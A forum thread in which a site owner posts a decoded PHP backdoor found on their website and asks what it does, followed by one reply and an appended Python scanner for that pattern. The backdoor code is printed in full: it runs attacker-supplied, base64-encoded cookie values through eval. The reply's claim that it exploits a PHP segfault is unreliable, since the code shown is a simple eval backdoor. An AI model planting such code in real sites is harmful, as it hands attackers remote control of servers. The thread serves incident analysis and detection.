Thread: Malicious Codes

  1. #1
    darksystem

    Malicious Codes : Please help

    Hi,

    I found an encoded file on our website, and when I decoded it, I got this code:

    Code:
    $c='count';$a=$_COOKIE;if(reset($a)=='th' && $c($a)>3){$k='3Password55';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '';}
    The same code in a more human-readable form:

    Code:
    $c='count';
    $a=$_COOKIE;
    if(reset($a)=='th' && $c($a)>3)
    {
    	$k='3Password55';echo '<'.$k.'>';
    	eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));
    	echo '';
    }
    Can somebody tell me what it is?
    I know that it is destroying our website, but I am not sure of the detailed information about it.

    I would appreciate it if somebody could explain the code above.

    Experts, please share your knowledge so that we can protect our website, and tell us what to do to prevent it.

    Kind regards
    Ebay API, OSC/CRE/OscMax/ZenCart/SEO Services
    Lucki Multimedia - Email

  2. #2
    Michael Morris
    You've been rooted. The code above exploits a segmentation fault in the PHP interpreter to create a backdoor into the system. A Google search against the first line of the code reveals that much. More specifics on the exact exploit used will require a more exhaustive search.

    The best procedure when dealing with a rootkit is to nuke it from orbit - that is, get your data off the machine, then reinstall the OS from scratch and make sure you are running the most current version of the branch of PHP you are using this time.

  3. #3
    darksystem
    Thanks, Michael.

    I am now fully aware of what the code does and how to prevent this hacking from happening.
    After careful research to prevent it, our website is now fully safe, I guess. At least for now.

    Anyway, thanks for your input; I really appreciate it.
    Ebay API, OSC/CRE/OscMax/ZenCart/SEO Services
    Lucki Multimedia - Email
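
A defender-side check for the pattern visible in the snippet from post #1 (a request superglobal aliased to a variable, decoded, and passed to eval), as an added example that is not part of the original thread. The names `scan_php` and `call_argument` and the finding labels are hypothetical, and the scan is a text heuristic rather than a PHP parser.

```python
import re

REQUEST = r'\$_(?:COOKIE|GET|POST|REQUEST|SERVER)\b'
ALIAS = re.compile(r'(\$\w+)\s*=\s*' + REQUEST)              # e.g. $a=$_COOKIE;
EVAL_CALL = re.compile(r'\b(?:eval|assert)\s*\(', re.I)
DECODER = re.compile(r'\b(?:base64_decode|gzinflate|str_rot13)\s*\(', re.I)
VAR_FUNC = re.compile(r"(\$\w+)\s*=\s*['\"](\w+)['\"]\s*;")  # e.g. $c='count';

# The one-line sample from post #1, embedded so the scan runs offline.
SAMPLE = r"""$c='count';$a=$_COOKIE;if(reset($a)=='th' && $c($a)>3){$k='3Password55';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '';}"""


def call_argument(src, open_idx):
    """Return the text inside the parenthesis opened at open_idx.
    Approximation: parentheses inside string literals are not skipped."""
    depth = 0
    for i in range(open_idx, len(src)):
        if src[i] == '(':
            depth += 1
        elif src[i] == ')':
            depth -= 1
            if depth == 0:
                return src[open_idx + 1:i]
    return src[open_idx + 1:]  # unbalanced input: take the remainder


def scan_php(src):
    """Return sorted finding labels for one PHP source string."""
    findings = set()
    # Variables that were assigned a request superglobal directly.
    tainted = {m.group(1) for m in ALIAS.finditer(src)}
    for m in EVAL_CALL.finditer(src):
        arg = call_argument(src, m.end() - 1)
        if re.search(REQUEST, arg) or any(
                re.search(re.escape(v) + r'\b', arg) for v in tainted):
            findings.add('eval-of-request-data')
        if DECODER.search(arg):
            findings.add('eval-of-decoded-string')
    # A function name hidden in a string and then called through the variable.
    for var, name in VAR_FUNC.findall(src):
        if re.search(re.escape(var) + r'\s*\(', src):
            findings.add('variable-function:' + name)
    return sorted(findings)


if __name__ == '__main__':
    print(scan_php(SAMPLE))
```

Run it over every `.php` file under the web root and review any file that returns a non-empty list; legitimate code rarely combines these traits.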

